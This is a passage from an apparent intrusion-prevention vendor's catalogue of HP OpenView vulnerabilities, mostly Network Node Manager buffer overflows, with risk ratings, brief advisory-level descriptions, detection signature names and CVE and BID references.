CVE-2010-1960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1960
BID-40637
http://www.securityfocus.com/bid/40637
Back to top

HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error when handling HTTP requests sent to the jovgraph.exe CGI application. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow
References:
CVE-2010-1964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1964
BID-40873
http://www.securityfocus.com/bid/40873
OSVDB-65552
http://www.osvdb.org/65552
Back to top

HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow in the HP OpenView Network Node Manager program jovgraph. The vulnerability is due to a boundary error when processing HTTP requests which contain a maliciously crafted displayWidth parameter. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed within the security context of the Internet Guest Account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow
References:
CVE-2011-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0261
BID-45762
http://www.securityfocus.com/bid/45762
Back to top

HP-OpenView-Network-Node-Manager-Nameparams-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The vulnerability allws remote attackers to execute arbitrary code via a long nameParams parameter.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-BOF
References:
CVE-2011-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0266
BID-45762
http://www.securityfocus.com/bid/45762
Back to top

HP-OpenView-Network-Node-Manager-netmon.exe-BOF

About this vulnerability: A stack buffer overflow vulnerability in the HP OpenView Network Node Manager library ov.dll
Risk: High
First detected in: sgpkg-ips-307-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the HP OpenView Network Node Manager library ov.dll. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an excessively long sel parameter to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-netmon.exe-BOF
References:
CVE-2010-1551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1551
BID-40067
http://www.securityfocus.com/bid/40067
Back to top

HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The vulnerability is due to a boundary error in one of the functions in nnmRptConfig.exe while handling the text1 parameter among the nameParams. Remote attackers can exploit this vulnerability by sending a crafted message to the affected service. Successful exploitation may lead to arbitrary code execution in the context of the affected service.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-BOF
References:
CVE-2011-0268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0268
BID-45762
http://www.securityfocus.com/bid/45762
Back to top

HP-OpenView-Network-Node-Manager-Nnmrptconfig-Schdparams-And-Nameparams-BOF

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow in HP OpenView Network Node Manager CGI program nnmRptconfig.exe. The vulnerability is due to a boundary error when processing HTTP requests which contain a maliciously crafted schdParams or nameParams parameter. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the context of the affected service.
Situation: HTTP_CSH-HP-OpenView-Nnmrptconfig-Schd-And-Nameparams-Potential-BOF
HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF
HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF-2
References:
CVE-2011-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0267
BID-45762
http://www.securityfocus.com/bid/45762
Back to top

HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Format String
Description: There is a format string vulnerability in HP OpenView Network Node Manager (NNM) CGI program nnmRptconfig.exe. The vulnerability is due to an error when processing HTTP requests containing a maliciously crafted Template name. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed within the security context of the Internet Guest Account user.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String
References:
CVE-2011-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0270
BID-45762
http://www.securityfocus.com/bid/45762
OSVDB-70474
http://www.osvdb.org/70474
Back to top

HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing HTTP request sent to CGI program OpenView5.exe. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, normally Internet Guest Account.
Situation: HTTP_CSU-HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow
References:
CVE-2008-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
BID-33147
http://www.securityfocus.com/bid/33147
Back to top

HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: Moderate
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error in the _OVBuildPath function defined in ov.dll when processing crafted HTTP request parameters. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the jovgraph.exe or the webappmon.exe CGI program on a target server, potentially causing arbitrary code to be injected and executed within the security context of the Internet Guest Account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow
References:
CVE-2011-3167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167
OSVDB-76775
http://www.osvdb.org/76775
Back to top

HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Language-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A stack buffer overflow exists in HP OpenView Network Node Manager (NNM) CGI program ovalarm.exe. The vulnerability is due to a boundary error when processing the Accept-Language HTTP header and the OvAcceptLang cookie value in a crafted HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server. In an attack scenario where arbitrary code is injected and executed on the target machine, the behavior of the target is dependent on the intention of the malicious code.
Situation: HTTP_CSH-HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Lang-BOF
References:
CVE-2009-4179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4179
BID-37261
http://www.securityfocus.com/bid/37261
Back to top

HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow

About this vulnerability: An integer oveyrflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: An integer overflow vulnerability exists in HP OpenView Network Node Manager software. The flaw is due to improper validation while processing specially crafted requests sent to the ovalarmsrv.exe server. Remote attackers could exploit this vulnerability to inject and execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow
References:
CVE-2008-2438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2438
BID-34738
http://www.securityfocus.com/bid/34738
OSVDB-54107
http://www.osvdb.org/54107
Back to top

HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in HP OpenView Network Node Manager Ovalarmsrv Service.
Situation: Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow
References:
CVE-2008-1852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1852
BID-28668
http://www.securityfocus.com/bid/28668
OSVDB-44654
http://www.osvdb.org/44654
Back to top

HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String

About this vulnerability: Format string vulnerability in HP OpenView Network Node Manager application ovet_demandpoll.exe
Risk: High
First detected in: sgpkg-ips-316-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Format String
Description: There is a format string vulnerability in the HP OpenView Network Node Manager application ovet_demandpoll.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String
References:
CVE-2010-1550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1550
BID-40065
http://www.securityfocus.com/bid/40065
OSVDB-64973
http://www.osvdb.org/64973
Back to top

HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-327-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an overly long string value of the OvJavaLocale parameter in the HTTP Cookie header to a target server, to execute arbitrary code in the security context of the webappmon.exe process.
Situation: HTTP_CSH-HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow
References:
CVE-2010-2709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2709
BID-42154
http://www.securityfocus.com/bid/42154
Back to top

HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The vulnerability is due to a boundary error in ovlogin.exe when processing the username and password parameters sent in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest Account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow
References:
CVE-2009-3846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3846
BID-37295
http://www.securityfocus.com/bid/37295
Back to top

HP-OpenView-Network-Node-Manager-OvOSLocale-Parameter-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP OpenView Network Node Manager software. The vulnerability is due to a boundary error while processing specially crafted HTTP requests sent to the server. Remote attackers could exploit this vulnerability to inject and execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: HTTP_CSH-HP-OpenView-Network-Node-Manager-OvOSLocale-Buffer-Overflow
References:
CVE-2009-0920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0920
BID-34134
http://www.securityfocus.com/bid/34134
Back to top

HP-OpenView-Network-Node-Manager-ovsessionmgr.exe-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in the HP OpenView Network Node Manager session management process, ovsessionmgr.exe
Risk: High
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP OpenView Network Node Manager session management process, ovsessionmgr.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the SYSTEM user.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow
References:
CVE-2009-4176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4176
BID-37330
http://www.securityfocus.com/bid/37330
OSVDB-60927
http://www.osvdb.org/60927
Back to top

HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI process OvWebHelp.exe
Risk: High
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI process OvWebHelp.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow
References:
CVE-2009-4178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4178
BID-37340
http://www.securityfocus.com/bid/37340
OSVDB-60929
http://www.osvdb.org/60929
Back to top

HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF

About this vulnerability: A buffer overflow vulnerability in the HP OpenView Network Node Manager program ovwebsnmpsrv.exe
Risk: High
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP OpenView Network Node Manager program ovwebsnmpsrv.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF
References:
CVE-2009-4181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4181
BID-37343
http://www.securityfocus.com/bid/37343
OSVDB-60932
http://www.osvdb.org/60932
Back to top

HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: Low
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in HP Network Node Manager that can allow remote attackers to execute arbitrary code on a vulnerable system. The flaw is due to a boundary error when processing crafted packets sent to the server. Remote attackers can exploit this vulnerability by sending an HTTP request to the affected TCP port. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. The injected code is executed in the security context of the service.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow
References:
CVE-2009-1420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1420
BID-35267
http://www.securityfocus.com/bid/35267
Back to top

HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution

About this vulnerability: A vulnerability in HP OpenView Network Node Manager (OV NNM)
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the HP OpenView Network Node Manager (NNM) CGI program nnmRptConfig.exe. The vulnerability is due to a boundary error when processing HTTP requests which contain a maliciously crafted schd_select1 parameter. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution
References:
CVE-2011-0269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0269
BID-45762
http://www.securityfocus.com/bid/45762
Back to top

HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow

About this vulnerability: A vulnerability in Hewlett-Packard OpenView Network Node Manager (OV NNM)
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP OpenView Network Node Manager CGI program snmp.exe. The vulnerability is due to a boundary error while parsing HTTP requests containing an overly long Oid value. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow
References:
CVE-2009-3849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3849
BID-37299
http://www.securityfocus.com/bid/37299
Back to top

HP-OpenView-Network-Node-Manager-Snmpviewer.exe-Host-Header-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Hewlett-Packard OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI snmpviewer.exe program. The vulnerability is due to a boundary error when processing the Host header from HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.
Situation: HTTP_CSH-Oversized-Host-Header-Field
References:
CVE-2009-4180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4180
BID-37261
http://www.securityfocus.com/bid/37261
Back to top

HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing HTTP request sent to CGI program Toolbar.exe. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected process, normally Internet Guest Account on Windows platforms.
Situation: HTTP_CSU-HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Handling-BOF
References:
CVE-2008-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
BID-33147
http://www.securityfocus.com/bid/33147
Back to top

HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in HP OpenView Network Node Manager due to a boundary error when processing HTTP request parameters.
Situation: HTTP_CSU-HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF
References:
CVE-2011-3166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3166
Back to top

HP-OpenView-Network-Node-Manager-Webappmon.exe-Cgi-Host-Header-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager (OV NNM)
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager CGI program webappmon.exe. The vulnerability is due to a boundary error when processing the Host header from HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.
Situation: HTTP_CSH-Oversized-Host-Header-Field
References:
CVE-2009-4177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4177
BID-37341
http://www.securityfocus.com/bid/37341
Back to top

HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF

About this vulnerability: A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe
Risk: High
First detected in: sgpkg-ips-305-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error in getnnmdata.exe when processing the Hostname variable sent in a crafted HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the getnnmdata.exe process. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code.
Situation: HTTP_CRL-HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF
References:
CVE-2010-1555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1555
BID-40072
http://www.securityfocus.com/bid/40072
Back to top

HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF

About this vulnerability: A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe
Risk: High
First detected in: sgpkg-ips-306-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an excessively long ICount value to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.
Situation: HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF
References:
CVE-2010-1554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554
BID-40071
http://www.securityfocus.com/bid/40071
Back to top

HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF

About this vulnerability: A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe
Risk: High
First detected in: sgpkg-ips-306-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an excessively long MaxAge value to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.
Situation: HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF
References:
CVE-2010-1553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553
BID-40070
http://www.securityfocus.com/bid/40070
Back to top

HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager ovwebsnmpsrv.exe
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM) ovwebsnmpsrv.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with a crafted arg value to the jovgraph.exe CGI application, potentially causing arbitrary code execution within the security context of the Internet Guest account.
Situation: HTTP_CRL-HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF
References:
CVE-2010-1961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1961
BID-40638
http://www.securityfocus.com/bid/40638
OSVDB-65428
http://www.osvdb.org/65428
Back to top

HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP OpenView Network Node Manager.
Situation: HTTP_CRL-HP-OpenView-NNM-ovutil.dll-Stringtoseconds-Buffer-Overflow
References:
CVE-2011-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0262
BID-45762
http://www.securityfocus.com/bid/45762
Back to top

HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow

About this vulnerability: A stack buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application snmpviewer.exe
Risk: High
First detected in: sgpkg-ips-307-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application snmpviewer.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.
Situation: HTTP_CRL-HP-OpenView-NNM-Snmpviewer.exe-Cgi-Stack-Buffer-Overflow
References:
CVE-2010-1552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552
BID-40068
http://www.securityfocus.com/bid/40068
Back to top

HP-OpenView-Omniback-II-System-Compromise

About this vulnerability: HP OpenView Omniback II has an unspecified remote command execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView OmniBack II
Type: Malfunction
Description: OpenView Omniback II is reported prone to an unspecified remote command execution vulnerability. This issue can allow a remote attacker to gain superuser privileges on a vulnerable computer.
Situation: Generic_HP-OpenView-Omniback-II-System-Compromise
References:
CVE-2001-0311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0311
BID-11032
http://www.securityfocus.com/bid/11032
Back to top

HP-OpenView-Operations-A.07.50-Buffer-Overflow

About this vulnerability: HP OpenView Operations A.07.50 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP OpenView
Type: Buffer Overflow
Description: A multiple stack based buffer overflow vulnerability in the Shared Trace Service in HP OpenView Operations A.07.50 which allows attackers to remotly execute arbitrary code via specially crafted requests.
Situation: Generic_CS-HP-OpenView-Operations-A.07.50-Buffer-Overflow
References:
CVE-2007-3872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3872
BID-25255
http://www.securityfocus.com/bid/25255
OSVDB-39527
http://www.osvdb.org/39527
Back to top

HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution

About this vulnerability: A vulnerability in HP OpenView Performance Insight (OVPI)
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Performance Insight
Type: Malfunction
